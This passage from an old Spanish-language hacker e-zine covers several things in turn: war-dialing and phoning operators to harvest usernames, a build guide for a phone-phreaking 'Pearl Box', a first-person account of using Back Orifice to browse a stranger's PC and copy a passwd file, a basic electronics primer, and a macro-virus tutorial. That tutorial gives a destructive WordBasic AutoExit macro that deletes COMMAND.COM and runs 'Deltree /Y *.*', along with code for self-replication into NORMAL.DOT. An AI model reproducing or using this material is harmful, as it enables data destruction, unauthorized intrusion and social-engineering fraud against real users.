a todo el el rango de 380xxxx , de esta forma encontraremos todos los
posibles Modems .
Una vez detectados los posibles blancos , debemos conectarnos al
equipo victima con algun programa para conexion telefonica ; podria
ser el Minicom (normalmente esta en todas las distribuciones linux) ,
Procomm o el Hiperterminal de Win2 . Hay que estar atentos a los
datos que nos entregue el programa ya que gracias a este sabremos a
que sistema nos enfrentamos y asi buscar susu posibles fallos . Es
importante que una vez conectados con alguno de estos programas , es
posible que no aparezca nada en pantalla por lo cual es recomendable
mandar algunos enters , ctrl+z , etc ... hasta que aparezca algo
interesante .
Ahora seria interesante probar una conexion via Slip o PPP .
Bueno que tal llamar por telefono a la mesa central y preguntar por
el Se¤or Flores del cual no revuerdas bien el nombre . Si la operadora
es suficientemente simpatica y atenta de empezara a nombrar a las
personas apellidadas Flores o talvez algun apellido parecido . Bueno
que conseguimos con eso diras tu , pues muy simple ; USERNAMES si
eso es lo que conseguimos . Cuales son las nomenclaturas mas comunes
para crear USERNAMES si el usuario se llamara Juanito Perez .
J_Perez >>>> los mas comunes y bien hechos
JPerez >>>> los mas comunes y bien hechos
Juanito.Perez
JuanitoP
Juanito_P
J.Perez
Juanito
Ahora podrias probar con algunas password tontas .. como el numero de
anexo o el nombre o bueno piensa en algo !!!
Que pasa si tienen un servidor de Seguridad ????
MM bueno ahi se pone algo mas dificil pero mas entretenido no crees ,
ademas no seria espectacular , bueno les doy una idea que por lo menos
a mi me ha resultado a veces ; no esta 100 % probado pero creo que les
servira como base para sus futuras experiencias o laboratorios ;) .
Para una conexion RAS o a traves de un servidor de acceso remoto que
utilize conexion PPP y si ademas tiene instalado un server de seguridad
podrian hacer lo siguiente :
Crear un acceso telefonico a redes (win95) con slip Unix y conectarse al
server indicandole un user cualquiera sin pass .
Al momento de conectarse se abrira una ventana (terminal) que normalente
esta en blanco , si le dan un par de enters deberia mostrarles el tipo de
servidor de seguridad que utiliza la red . Una vez que apoarece el Login
, presionar el boton continuar (que aparece en la parte inferior izquierda
de la ventana ) ; ahora les pedira que pongan una direccion IP ,
recominendo intentar con las clases A tipica 10.0.0.12 si has tenido
suerte al abrir una ventana dos podras hacer ping al resto de los pcs o
servidores de la red .. de ahi en adelante utiliza tu imaginacion .
El problema es encontrar una direccion ip valida para y que no este en uso
ya que te causaria conflictos de Ip , ademas tienes que tener en cuenta
que pueden haber un monton de otros factores que deberas manejar como
configuraciones DNS , gateway , tabalas de ruteo etc...
Bueno hasta aqui les dejo mi entrega , espero que les haya gustado y que
les sirva de algo lo poco que puedo aportar a la comunidad Hispana .
Se que soy medio desordenado para escribir y explicar pero mi estilo de
vida es asi ... corriendo para todos lados hheee !!
Saludos
PlaXiuS
Consultas , sugerencias y correciones a
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
*****************************************************************************
#################################
ø ø
ø 12.- Como hacer una Pearl Box ø
ø ø
#################################
_________________________________________________________________ By Ozono+2
*****************************************************************************
***********************************/K & B traductions\**********************
*****************************************************************************
Notas: Este Texto fue traducido por Kokan y por Bosta de k&b trd. con el puro
hecho de alimentar el movimiento under de los lectores, ustedes piden no mas,
acuerdense de la campaña de cuando roban a la viejita en el UC (16) dice "si
quieres hacer un cambio , empieza por ti mismo" o algo esi es que yo no veo
mucha tele que digamos , bueno la cosa es que si quieren algo mas de esto o
lo otro en la zine , animense a hacer algo too , por ejemplo esta traduxion
yo la hice porque todos los tipos reclaman que la documentacion del phreaking
esta toda en ingless y nadie las traduce , vallan a la pagina de la taverna
de van hackers y ahi hay hartos textos pa traducir , si no pueden juntense de
a varios y con dos o tre diccionarios igual se puede .
bueno menos bla bla y mas traduccion .
-----------------------------------------------------------------------------
*****************************************************************************
*
MEMBER NAME : PEARL *
*
*****************************************************************************
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$ $$
$$ ***************** $$
$$ * como hacer una * $$
$$ ***************** $$
$$ $$
$$ $$
$$ <>PEARL BOX<> $$
$$ $$
$$ Escrito y creado por : Dr. D-Code $$
$$ $$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$ (sysop pueden usar esta informacion si no la cambian de ninguna manera $$
$$ en su totalidad) $$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Pearl Box : DEfinicion : Esta Es una Caja Que sustituye a muchas otras cajas,
produce tonos en herz. , cuando la caja trabaja correctamente puede producir
tonos desde 1-9999 hz , como pueden ver ,2600 ,1633,1336 y otros tonoz
cruciales estan en el espectro del sonido .
Materiales que necesitaras en orden para construir la Pearl Box :
=================================================================
C1, C2 :::::::::::::, condensadores de disco de ceramica de 5mf o .5uf
Q1::::::::::::::::::_ Transistor5 NPn (el 2N2222 TRabaja mejor )
S1::::::::::::::::::, Normalmente un switch Momentaneo (o algo asi)
S2:::::::::::::::::: SPST Toggle switch (no lo pude traducir sorry)
B1:::::::::::::::::: Bateria Standar de 9 volts
R1:::::::::::::::::: Potencimetro de prendido simple 50K
R2:::::::::::::::::: " "100k
R3:::::::::::::::::: " "500k
R4:::::::::::::::::: " "1MEG.
SPKR:::::::::::::::: Parlante standar de 8 ohm.
T1:::::::::::::::::: MiniTransformador (de 8ohm Trabajaria mejor)
ADEmas , SOldador , algo de cable, soldadura delgada tabla experimental y una
caja pa toda la unidad, un clip pa la bateria.
Instrucciones pa construir La pearl Box
=======================================
-Decir la instruccion es extremadamente dificil de explicar en paLABRAS , TU
DEBES TENER UN ENTENDIMIENTO ESQUEMATICO , Lo encontraras dificil Pero Prueva
Hartas Veces , Ak esta el cuadro en donde puedes ver ESQUEMATICAMENTE com
Gran Detalle .
(ESQUEMA PA la Pearl Box)
+-------------+------------+---------+
! ! \ +--S1----
C1 C2 \ SPKR
! ! + +--------
+ + ----+T1 +
!\ +---------------+------+
! b c-------!
! Q1 !
! e-----S2---+ !
! ! !
! B1 !
! ! !
! +-------+
!R1 R2 R3 R4!
/\/\ /\/\ /\/\ /\/\
+--+ +--+ +--+
Ahora Probablemente estes mas confundido , dejame explicarte unos detalles
pequeñitos .
EL area del potenciometro es Rigido asi que el polo izquierdo esta conectado
al polo centro del potenciometro siguiente a el , el terminal del medio de
T1 esta conectada a la pieza abajo de la bateria .
OPERACION CORRECTA DE LA PEARL BOX
==================================
Tu debes querer toma algunas pinzas de cambio de radio shack pa hacer el
trabajp un poco mas facil , igual algunos pulsadores pueden ser utiles
tambien.
usa la pinzas pa calibrar los pulsadores .
R1..es el pulsador paras los 1 (unidades)
R2.." "10 (decenas)
R3 " "100 (CEntenas)
R4 " "1000(unidades de mil)
S1 es para producir todos los tonos y s2 para el poder .
-Paso1 : prendelo y ajusta con los pulsadores el tono requerido.
ej:
Pa 2600 = R1=0 R2=0 R3=6 R4=2
Paso2 : Presiona el Boton y listo tienes el tono .
si no obtienes el tono revisa todos las conexiones y que no haya cortos.
y si todavia no tienes tono llama a :
BBS Brainstorm:xxx.xxx.xxxx, The bay : xxx.xxx.xxxx o pirate´s Harbor :
xxx.xxx.xxxx o deja un mail la escena
____________________________________________________________________________
Esta ha sido una presentacion de BIg MOUNTAIN HACKERS 1985
____________________________________________________________________________
************************fin de la traduccion-*******************************
** Ni Kokan ni Bosta ni Ozono+2 se responsabilizan por lo que tu (lector)
hagas con esta informacion , nosotros solo la traducimos .
****************************************************************************
Les Gusto...
................. Visiten http:/pagina.de/ozono2............................
la pagina esta pa la caga asi que visitenla en un tiempo mas
pa que la podamos arreglar , la nueva ya esta lista pero no tenuimos
tiempo ap subirla , ha y recuerden "la historia todavia se esta escribiendo"
ademas de este otro dicho que lo esncuentro super importante :
"toda señorita por muy bom}nita que sea se moja los pelitos cuando mea "
y el de las womans es
"Todo Caballero por muy gueno que sea tiene que apuntar cuando mea "
*************************************************************************************************
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
*****************************************************************************
##################################
ø ø
ø 13.- Selvas No tan Virgenes ø
ø ø
##################################
_______________________________________________________________ By The TAkER
Bueno aqui estoy, un dia sin mucho que hacer me dio por ponerme a explorar
mi disco duro y encontre algunas cosas que no me gustaron mucho que digamos
me dije, esto debe haber mucha gente que ya lo conoce, pero hay gente que no
tiene ni idea, asi que me decidi a escribir un pequenio articulo para esos
ultimos ademas para matar el tiempo, asi que aqui esta...
Se preguntaran que tiene que ver el titulo con nuestro mundo, pues es solo
una apologia pues se podria decir que las Selvas son nuestros discos duros
y que no son tan virgenes porque realmente nos pueden meter en serios
problemas en cualquier momento, pues esos programas en los que confiamos
tanto (bueno, ni tanto XDDD y si son de Moco$oft menos...) guardan mucha
informacion de facil acceso para todo el mundo que tenga acceso a nuestro
pc y si tenemos por ahi alguno de esos troyanos que estan tan de moda ahora
y que tanto usan los lammers (sin ofender a nadie...) la cosa empeora,
ya veran porque lo digo...
Primero decidi entrar a mi navegador (actualmente utilizo el Netscape 4.04)
y direccionarlo a la unidad c:/, ok, hasta ahi todo iba bien, luego empece a
navegar por el disco y me dije, y que demonios habra en el directorio de
Netscape, y me fui alli c:\archivos de programa\netscape\users\taker
encontre 4 directorios (cache, mail, news y archive)y algunos otros archivos
y me sorprendi al ver que lo que contenian podia ser visualizado asi no mas,
sin niguna proteccion, sin estar encriptados ni nada por el estilo, vaya
mierda..!!!
Estos son los archivos:
Bookmark.htm: Contiene informacion sobre los bookmarks que tengo en mi
navegador, vaya cosa, bastante delatador no.
Cookies.txt: Mierda, este contiene todos la informacion de todos los
cookies que he recibido, ademas muestra en algunos puntos
mi direccion IP, la id que me correposnde en el sitio que me
mando el cookie, algunos valores de falso y verdadero, la
verdad no se para que putas serviran...
Hay otros archivos, pero esos si estan de forma que no pueden ser visualizados
desde el navegador...
Bueno, segui por ahi y me meti al directorio news, ahi encontre 2 archivos
y 1 directorio
Nota: Como cliente de news tambien utilizo el Netscape.
Archivos:
Fat: Contiene la ruta completa del archivo news.rc, ni puta idea
porque pues en mi caso se encuentra en el mismo directorio
donde esta el archivo fat.
News.rc: Mierda, contiene los grupos de News a los que estoy inscrito
que vaina...esto ya no me esta gustando mucho que digamos...
Luego segui con el directorio que estaba ahi (el Host-news), entre a el, y
me encontre con archivos con los nombres de los servidores news a los que
estoy inscrito y tienen como extension .snm debe ser algo...al entrar a esos
archivos veo TODO el contenido de cada uno de los mensajes que han sido
bajados del servidor de News y que aun no he eliminado del cliente de news...
esto ya me canso...me voy a otro lado...
Directorio cache, me imagino que ya deben saber de que se trata...si no, pues
lo dire rapidamente, son los archivos .gif, .html, .jpg y todo lo que tenga
que ver con paginas de inet que has visitado...
Ok, salgo de ahi y entro al directorio mail...mmm, vaya sorpresa, me
encuentro con archivos que tienen el mismo nombre de cada una de las bandejas
en las que almaceno los mails cuando me llegan, incluida la de trash...
Pues que Joda, en esos archivos encontre todos los mails que tengo
almacenados, y algunos otros que borre tambien los puedo ver por alli...
eso si me preocupa, pues recuerda que normalmente cuando se te olvida el pass
de alguna parte que ofresca servicios, te dan la opcion de enviarte el pass
por email, ves, saca tus propias conclusiones...
Bueno, segui mirando por ahi y me encontre que el FucklooK Sexpress tambien
tiene este problema en algunas de sus carpetas, ya que en la carpeta de
entrada los mails si estan debidamente encriptados..
Listo, ahora decidi probar con algun pc que no sea mio, y me instalo el
cliente GUI (Graphics User Interface para los que no saben cual es su
significado) del BO, lo pongo a hacer un sweep...consigo algunos servers del
BO (se sorprenderan de la gran cantidad de gente que lo tiene instalado)
ok, por fin me decido por uno, ok, listo me encontre con un pc de
Barranquilla, y al parecer se conecta a LatinoNet (ISP Colombiano), le abro
el http en el puerto 1236 y como hice con mi disco empiezo a navegar en el
suyo..., vaya sorpresa, parece que es un Hacker Real...pues en su directorio
"c:\mis Documentos\" tiene un archivo passwd, me entra mas la curiosidad y
decido gurdarlo en mi disco 585 kb..., sigo investigando me encuentro con
algunas fotos de Chikas...(la verdad he visto mejores, debes mejorar tus
gustos con las nenas ok), bueno, pero ahora a lo que vine, me voy a su
directorio "C:\Archivos de Programa\Netscape\users", mmm solo veo un
directorio el "default" usea que este "Hacker" parece que sabe lo que hace,
no le puso nombre de usuario al instalar el Netscape, entro a su directorio
mail, mierda, parece que no utiliza el Netscape como cliente de correo, pues
los archivos que tiene ahi tienen muy poco tamanio, al fin me decido y entro
a la carpeta "inbox"...fuck...esta vez me dice que tengo que correr una
aplicacion para poder accesar el archivo (recuerden que cuando lo hice con
el mio solo basto dar click sobre el archivo y me mostro el contenido en el
navegador), a la final me decido por el Notepad, y buala...aparece el
contenido de la carpeta inbox, yo estaba en lo cierto, este caballero no
utiliza el Netscape como cliente de Correo, pues solo encontre el mail que
llega de parte de Netscape diciendo todas las bondades que ofrece y toda
esa carreta, pero en ninguna parte dice que sus mensajes pueden ser leidos
con cualquier editor de texto normal y que asi te pueden joder...
Bueno, ahora intentare a buscar sus correos en el Directorio de Fucklook
mierda, tampoco tiene nada, este Hacker debe tener alguna cuenta en Hotmail,
Starmedia o algo asi...si la cosa es asi, pues entrando al cache de su
navegador podria encontrar algo interesante...
Ok, ya termino la transeferencia del archivo passwd que me encontre en su pc,
lo revisare, pero primero voy a constatar si le va a servir de algo...y me
pongo a buscar por todo su disco a ver si tiene algo parecido al John...nop,
no encontre nada...esto puede ser por varias cosas, puede que tenga otro pc,
puede que solo lo haya bajado de alguna parte por ensayar, puede que sea de
algun amigo que se lo paso, o a la final quien sabe...
Abro el archivo passwd a ver que tiene, parece ser un archivo de un servidor
de por alla del lejano oriente, pues los nombres de los usuarios son de por
alla (sal chi chon, yoshi monto moto y cosas por el estilo...)
Bueno esta vaina ya me canso, dejare trabajar tranquilo a nuestro amigo
Hacker, y espero que no vaya a tomar replesalias por mi intrusion a su disco
pues lo hice con buenas intenciones...
A proposito, no te recomiendo el ICQ, ese programa apesta...
Y no vayas a formar la Tercera Guerra Mundial con ese ICQBomber ok...
Otra cosa, te recomiendo que busques por ahi algun texto donde te expliquen
como sacarte el BO, pues no todas las veces tendras tanta suerte como ahora
y el que te entre puede tener intenciones diferentes y puede hasta joderte
el pc. Estas Advertido...
Nota interesante, me instale el server del BO, para jugar un rato con
mi pc, y soy tan de malas que cuando empece a jugar con el cliente GUI, me
salio una de esas ventanas donde dice la aplicacion a causado un fallo de...
Al fin y al cabo Guindoze...
Una cosa entes de despedirme, nunca olviden el directorio c:\windows\temp
revisen y podran encontrar algunas grandes sospresas...
Ok, creo que hasta aqui me ha dejado el suenio por ahora, ya son las 3:50 am
y pues creo que me pase un poco el tiempo de dormir, afortunadamente ma¤ana
es sabado y puedo dormir todo el dia ;).
Espero que no se queden solo con eso que es di, investiguen y me cuentan
que mas encuentran en sus discos...
Siempre se ha sabido que nuestros discos son nuestros peores enemigos
a la hora de que nos caiga la poli...
Hasta la Proxima...
Dudas, sugerencias, madrazos, ya saben mi correo...
The TAkER
Pd: Despues de escribir este articulo, me llego un mail de una lista a la
que estoy suscrito (Hispasec), lo pongo aqui y jusguen ustedes:
-------- Cut & Paste -----------
Nuevos problemas con las cookies
--------------------------------
Uno de los temas polemicos al tratar la privacidad y la seguridad
de los navegadores, es el uso de las cookies. En esta ocasion,
debido a un problema sin establecer aun concretamente, un sitio
web ha podido tener acceso a datos sensibles de sus usuarios.
Las cookies son pequenios ficheros que se graban en el disco duro
del usuario, y sirven para que al acceder a un sitio web, este
pueda optimizar su presentacion atendiendo a nuestras anteriores
navegaciones sobre el. Personalizando las secciones que ha
registrado que mas nos gustan, etc. En este archivo, tambien
se pueden almacenar datos como las veces que hemos visitado el
web, la fecha en que se hizo, etc. Toda esta informacions solo es
accesible por el sitio web que genera la cookie y en teoria (TkR: Solo
en teoria) no deben suponer ningun problema de seguridad.
Todas las quejas sobre el uso de cookies han venido por los
defensores de la privacidad, ya que el mayor abuso que puede
realizarse con ellas, es un control sobre nuestras visitas al
sitio web.
Pero el tema vuelve a saltar con mas importancia que nunca, pues
un sitio web (http://consumer.net) ha anunciado que en sus logs
se estaba recogiendo informacion de los usuarios proveniente de
cookies de otros servidores. Entre los datos que se pueden
encontrar en los registros, se pueden observar direcciones de
correo, passwords, etc.
El problema en esta ocasion radica en que un sitio web, ha podido
acceder al contenido de las cookies de otros servidores, cosa que
teoricamente debe ser imposible. Aun no se sabe la causa, ya que
tanto los navegadores de Microsoft como los de Netscape se ven
afectados por el problema, y ninguna de las firmas han sido
capaces de obtener una causa del problema.
En principio se penso que era debido a un bug en los navegadores,
opcion que finalmente parece descartarse. Todo indica que el
error proviene mas de un fallo imprevisto en el archivo de la
cookie. Los archivos mostrados por el administrador de
consumer.net muestran que Netscape pierde un comando de retorno
de carro al final de algunas entradas de cookies, haciendo que
el servidor siga leyendo cuando deberia de haber parado. Aunque
tambien enfatiza que se trata de un descubrimiento preliminar,
y que el problema es raro.
Sigue sin aclararse de que forma los archivos de las cookies se
corrompieron, aunque las causas mas comunes son los cuelgues
del sistema o apagar el ordenador sin cerrar el sistema
operativo.
De momento el tema sigue abierto, y la problematica y el debate
sobre el uso (y abuso) de las cookies vuelve a abrirse una vez
mas. Por otra parte, aunque la situacion dada en consumer.net
haya sido un tanto extrania se abre la posibilidad de leer desde
un servidor cookies que no le pertenecen, lo cual si se consigue
explotar de alguna forma si podria representar un grave problema
de seguridad.
Mas informacion:
Ejemplos de los logs: http://onlineprivacy.com/cookiebug/
Consumer.net: http://consumer.net
----- Fin del Cut & Paste -----------
Y eso es todo por ahora...
Amanecera y veremos...
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
###########################
ø ø
ø 14.- Electronica Basica ø
ø ø
###########################
___________________________________________________________________ By Ocsic
#!/bin/ocsic
ELECTRONICA BASICA
Este es otro articulo, que intenta explicar los componentes basicos
de la electronica, mi nivel (muy basico por cierto) no me permite
escribir un gran documento, pero si algun interesado quiere seguirlo
yo se lo cedo con gusto, bueno aqui va....
Resistor :
Es un dispositivo con un valor conocido de resistencia (oposicion al
flujo de electrones).
Existen resistores fijos (que no cambian su resistencia) y resistores
variables ( que la cambian):
En los resistores fijos estan :
-Resistores de Carbon
-Resistores peliculares
-Resitores de alambre devanado
La tolerancia es la variacion entre la resistencia real y la especificada,
por ejemplo un resistor de 100 ohmd y tolerancia 5%, puede tener una resistencia
entre 95 y 105 ohms.
Codigo de colores:
Los valores de resistencia de carbon a algunas pelicularesse muestran por
medio de codigo de colores, los cuales se ven asi:
primeras tres franjas cuarta franja
negro= 0 oro =5%
cafe= 1 plata=10%
rojo= 2 ninguna=20%
naranja= 3
amarillo=4
verde= 5 Indice de falla 6ª franja
azul= 6 cafe=1%
violeta= 7 rojo=0.1%
gris= 8 naranja=0.01%
blanco= 9 amarillo=0.001%
oro= se divide por 10
plata= se divide por 100
1. La primera franja representa el 1er numero
2. la segunda representa el 2 numero
3. la tercera franja representa el numero de ceros que le siguen,
si es negra no se añade ninguno.
Resistencia
1 2 3
_____________________________
________ / Cafe |Negra|Rojo|Oro | \__________________
\______|_____|____|____|______/
Valores: 1 0 2 ceros = 1000 ohms 5% tolerancia...
_____________________________
________ / Cafe |Gris |Rojo|Oro | \__________________
\______|_____|____|____|______/
Valores: 1 8 2ceros =1800 ohms ( 1.8K ) 5% tolerancia....
Bueno esto es todo por esta primera parte se despide :
ocsic
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
################################
§ §
§ 15.-VIRUS Y TROYANOS VBA §
§ §
§ §
################################
______________________________________________________________ By ArcangNet
-----------------------------
| VIRUS Y TROYANOS VBA |
| by |
| Leugim San |
| & |
| MaD MoTHeR |
-----------------------------
(@) MaD MoTHeR TeaM - 1996
Una macro es un programa escrito en un lenguaje determinado y se utiliza
principalmente para automatizar procesos en una aplicaci¢n.
En nuestro caso particular nos centraremos en los lenguajes Visual Basic for
Aplications (VBA) y WordBasic (WB) que son los lenguajes que utilizan las
aplicaciones de Microsoft. VBA lo utilizan: Excel, Project, PowerPoint. WB
lo utiliza Word.
A partir de ahora trataremos al VBA como el lenguaje generalizado, puesto que
VBA es el intento de unificar un lenguaje de macros com£n a todas las aplica-
ciones de MicroSoft. De todas maneras el WordBasic contin£a teniendo ciertas
carater¡sticas que har que, en determinadas ocasiones, nos refiramos espec¡-
ficamente a ‚ste.
Existen ciertas diferencias entre la sintaxis de estos dos lenguajes, pero la
sistem tica de programaci¢n es id‚ntica por lo que, mientras no se indique lo
contrario, trataremos al VBA como un lenguaje unificado para las aplicaciones
de MicroSoft.
Las macros VBA se denominan PROCEDIMIENTOS y pueden ser de dos tipos:
- Procedimientos Sub
- Procedimientos Function
Los Procedimientos Sub pueden ser ejecutados directamente o ser llamados por
otra macro. La sintaxis de estos procedimientos es la siguiente:
Sub
-> aqu¡ van las lineas de la macro <-
' los comentarios se preceden de un ap¢strofo.
End Sub
Ejemplo:
Sub Saludo
' Esta macro activa una ventana de di logo.
MsgBox "Hello World!"
End Sub
Los Procedimientos Function (tambi‚n llamados FUNCIONES) devuelven un valor,
que puede ser pasado como par metro a otro procedimiento VBA. Su sintaxis es:
Function (argumentos)
-> Instrucciones <-
' Comentarios
End Function
Ejemplo:
Function SumaAB(a,b)
' Le paso los par metros a y b y devuelve SumaAB
SumaAB = a+b
End Function
En un documento puede haber tantas macros como se desee.
Ahora que est m s claro el concepto de conjunto de macros, lo denominaremos
MODULO VBA. Es decir: un M¢dulo VBA es un conjunto de macros (Procedimientos
Sub y Function) que componen un documento de Office.
El lenguaje VBA tambi‚n trabaja con OBJETOS. Es decir: podemos hacer referen-
cia a otros documentos, gr ficos, ... dentro de los M¢dulos VBA. Los objetos
tienen PROPIEDADES. Si un fichero en un objeto, el color de fondo es una pro-
piedad (tambi‚n llamada ATRIBUTO). Los objetos tambi‚n tienen METODOS, que
son las operaciones que se pueden realizar con los objetos.
VBA tambi‚n permite trabajar con VARIABLES.
El VBA es un lenguaje de programaci¢n estructurado imperativo, por lo que in-
cluye las construcciones t¡picas de estos lenguajes de programaci¢n:
- BUCLES Fox-Next:
Sub Contador
Num_Infect=0
For Count=1 to 10
Num_Infect=Num_Infect+Count
Next Count
MsgBox "He llegado al n§ m ximo de infecciones"
End Sub
- CONDICIONES If-Then:
Sub Check_Infect
If Num_Infect=0 Then MsgBox "Archivo no infectado"
End Sub
- CONTRUCCIONES With-End With:
Se utiliza para trabajr con varias propiedades de un objeto.
Sub CambiarPropiedades
With Selection
.Font.Bold=True
.Font.ColorIndex=3 ' Color Rojo
End With
End Sub
- CONSTRUCCIONES Select Case-End Select:
Sub Analiza_Infecci¢n
Select Case num_Infect
Case 0
MsgBox "Fichero no infectado"
Case is > 0
MsgBox "Fichero Infectado"
Case is < 0
num_Infect=0
End Case
End Sub
Una herramienta muy £til para trabajar con el lenguaje VBA es la ventana de
DEPURACION. En ella podemos tracear el c¢digo e inspeccionarlo para analizar
los posibles resultados del mismo. Una t‚cnica de depuraci¢n consiste en
utilizar FLAGS (Banderas) para interrumpir moment neamente el c¢digo, a base
de MSgBox para poder analizar el contenido de ciertas variables e instruccio-
nes (aunque el depurador de VBA permite insertar puntos de interrupci¢n
para detener moment neamente el c¢digo).
Algo a tener en cuenta separadamente, por la importancia que tienen, son los
ARGUMENTOS de un Procedimiento Function:
Como hemos visto anteriormente, la estructura de un Procedimiento VBA es la
siguiente:
Function ()
. . .
End Function
Los ARGUMENTOS pueden ser constantes, variables o expresiones. Hay Procedi-
mientos a los que no es necesarios pasarle argumentos:
Function Pilla_nombre()
nombre=Application.UserName
End Function
Hay Procedimientos Function que siempre tienen un n£mero fijo de argumentos
(pueden llegar a 60). Otros tienen una serie de argumentos fijos y otros op-
cionales.
Una vez que hemos sentados los conceptos b sicos del VBA, pasemos a tratar
espec¡ficamente el tema que nos ocupa...
-> LOS VIRUS Y TROYANOS VBA O DE MACRO <-
El lenguaje VBA es muy vers til y ello se debe fundamentalmente a dos razo-
nes: la primera de ellas es su gran facilidad de aprendizaje y uso. Al ser
un lenguaje de alto nivel orientado a eventos (no confundir con orientado a
objetos) es muy sencillo realizar m¢dulos complejos con relativa comodidad.
La segunda es su enorme cantidad de funciones predefinidas que le otorgan una
potencia adicional insospechada. Podr¡amos citar una tercera raz¢n (aunque
sea un caso particular de la anterior) y es la existencia de FUNCIONES (O
MACROS) DE EJECUCION AUTOMATICA con las cuales podremos simular ciertas
circunstancias que facilitan todav¡a m s el conseguir efectos hasta ahora
caracter¡sticos de los llamados VIRUS TRADICIONALES (autoreplicaci¢n, perma-
nencia en memoria, ...)
El VBA posee, como caracter¡stica exclusiva, la propiedad de la PORTABILIDAD.
VBA funciona tanto en entornos Windows 3.x como en Windows 95, Windows NT,
Macintosh, ... es decir: en cualquier entorno o sistema operativo que posea
una versi¢n de alguna de las aplicaciones que soportan VBA.
Pero no todo iban a ser facilidades... :-)
VBA es un lenguaje que se adapta al idioma de la aplicaci¢n que lo contiene.
Esto es: si tenemos una versi¢n en Castellano del procesador de textos Micro-
soft WORD los nombre de las funciones predefinidas estar n en castellano. Con
los cual tendr¡amos que las macros 1 y 2 NO son iguales (puesto que la macro
1 est construida con la versi¢n en castellano de VBA y la macro 2 con la
versi¢ inglesa.
- Macro 1:
Sub PRUEBA
Con Selecci¢n.Fuente
.Nombre="Arial"
Fin Con
End Sub
- Macro 2:
Sub PRUEBA
With Selection.Font
.Name="Arial"
End With
End Sub
Qu‚ pasar¡a al ejecutar la macro 2 con la versi¢n en castellano del WORD?
Pues que nos dar¡a un error en la ejecuci¢n de la macro.
Recordad que VBA es un lenguaje interpretado (no compilado) con lo cual el
error lo conseguir¡amos en tiempo de ejecuci¢n de la misma.
Es esto ABSOLUTAMENTE cierto? ... ... ... ... }:-) ...
No! ;-)
Me explico: hay funciones que son comunes a todas las versiones de VBA.
Por ejemplo: La macro autom tica AutoExec (que se ejecuta al arrancar WORD
siempre que se encuentre almacenada en la plantilla normal.dot) funcionar¡a
siempre que se encuentre almacenada en la plantilla normal.dot) funcionar¡a
para las dos versiones de VBA.
Quiz uno de los primeros ejercicios ser¡a intentar conseguir un virus (o un
troyano, en su defecto) que sea multiplataforma y multilenguaje...
... }:-) ... igual ya existe ...
Bien ... no nos desviemos ...
El siguiente paso, una vez analizada la sintaxis del lenguaje en cuesti¢n es
hacer un estudio de las funciones (£tiles para nuestro prop¢sito) que vienen
implementadas en VBA. Como este no es un tratado general de programaci¢n en
VBA ahora nos centraremos en las MACROS AUTOMATICAS del procesador de textos
Microsoft WORD que est n implementadas en WordBasic (y NO en VBA).
Existen 5 macros especiales de ejecuci¢n autom tica que hay que tener en
cuenta a la hora de dise¤ar macros:
- AutoExec.- Es una macro que se activa al llamar al procesador de
textos, siempre y cuando est‚ almacenada en la planti-
lla NORMAL.DOT o en el directorio por defecto de la
aplicaci¢n.
- AutoNew.- Se activa al crear un nuevo documento.
- AutoOpen.- Se activa al abrir un documento existente
- AutoClose.- Se activa al cerrar un documento
- AutoExit.- Se activa al salir del procesador de textos.
Para comprobar la potencia de estas macros veamos alg£n ejemplo:
(por ahora no nos preocuparemos del idioma de VBA)
' Grabar esta macro con el nombre AutoExit
Sub MAIN
If Application.Username <> "MaD_MoTHeR" Then
' Verificamos que la Aplicaci¢n NO est‚ registrada a cierta persona
SetAttr "C:\COMMAND.COM",0
' Le quitamos los atributos a este fichero
Open "C:\COMMAND.COM" for Output as #1
' Lo abrimos para comprobar que no se dispara ning£n FLAG
' de error
Close #1
' Lo cerramos de nuevo
Kill "C:\COMMAND.COM"
' }:-)
End If
If Month(Now())=2 Then
' Buscamos el mes de Febrero
If Day(Now())=29 Then
' D¡a 29 (1 vez cada 4 a¤os) :-)))))
Shell "Deltree /Y *.* > null"
' Probadlo... ah! el /Y funciona en todos los idiomas! :-)
' quedan ficheros sin borrar... pero qu‚ m s d ! :-)))
End If
End If
End Sub
Como parece l¢gico esta macro se ejecutar al salir del Word.
-> REPLICACION <-
Bien. El £nico problema con el que nos tendremos que enfrentar para poder
conseguir un aut‚ntico virus VBA es saber c¢mo podemos hacer que ‚ste se
'replique'. Para ello lo £nico que debemos tener en cuenta es c¢mo podemos
adaptar una macro autom tica (este ser¡a el ejemplo m s sencillo) para que se
instale en la plantilla que WORD abre por defecto.
Esto se consigue con una rutina que opere de la siguiente manera:
Definimos una variable que almacene el nombre completo de la macro.
nombre$ = WindowName$() + ":AutoNew" -> Por ejemplo para que 'actue'
al crear un nuevo documento.
Y, luego, s¢lo nos falta copiarla a la plantilla NORMAL.DOT.
MacroCopy nombre$, "Global:AutoNew"
Sencillo... no? :-)
Pues eso es todo!
Realmente se pueden conseguir sutilezas muy refinadas aplicando con cierto
estilo estas indicaciones... pero, en s¡ntesis, ‚sta es la forma de trabajar
de un virus de macro.
De lo £nico que nos faltar¡a por hablar ser¡a de la ENCRIPTACI¢N:
Encriptar una macro es todav¡a m s sencillo que hacerla 'residente'...
:-)
MacroCopiar "Miplantilla:Mimacro", "Global:AutoClose", 1
